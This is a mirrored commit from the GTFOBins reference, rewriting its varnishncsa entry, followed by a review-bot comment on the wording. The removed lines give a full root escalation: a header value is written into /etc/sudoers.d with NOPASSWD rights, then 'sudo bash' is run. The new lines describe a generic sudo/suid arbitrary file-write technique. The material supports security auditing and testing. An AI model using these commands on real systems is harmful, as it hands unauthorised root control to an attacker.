mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Polish varnishncsa

Andrea Cardaci 2023-12-23 12:40:09 +01:00 committed by GitHub
parent 0190295ed2
commit efaf1b11e8
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

@ -1,8 +1,18 @@
--- ---
description: varnishncsa utility reads varnishd shared memory Varnish logs and presents them in the Apache / NCSA "combined" log format. description: |
This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
```
curl -H 'yyy: DATA' http://localhost:6081/xxx
```
description:
functions: functions:
sudo: sudo:
- code: sudo varnishncsa -g request -q "ReqURL ~ \"/exploit_randomfoo\"" -F '%{exploit}i' -w /etc/sudoers.d/user & code: |
- code: curl -H 'exploit: user ALL = (ALL) NOPASSWD: ALL' localhost:6081/exploit_randomfoo LFILE=file_to_write
- code: sudo bash sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
--- suid:
code: |
LFILE=file_to_write
./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
---
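
Review bot: In the new description, "the content of a certain header" and the sample `curl -H 'yyy: DATA' http://localhost:6081/xxx` are never tied to the `-F '%{yyy}i'` and `-q 'ReqURL ~ "/xxx"'` arguments used in the `sudo` and `suid` entries, so the reader has to infer that `xxx` and `yyy` are placeholders that must match across the two commands. Suggest stating that explicitly in the description and, in the same sentence, changing "This allows to write arbitrary files" to "This allows writing arbitrary files". The old opening sentence on what `varnishncsa` does (reads the varnishd shared memory logs and formats them) is also dropped; a short version of it would explain why a request header ends up in the `-w` output file.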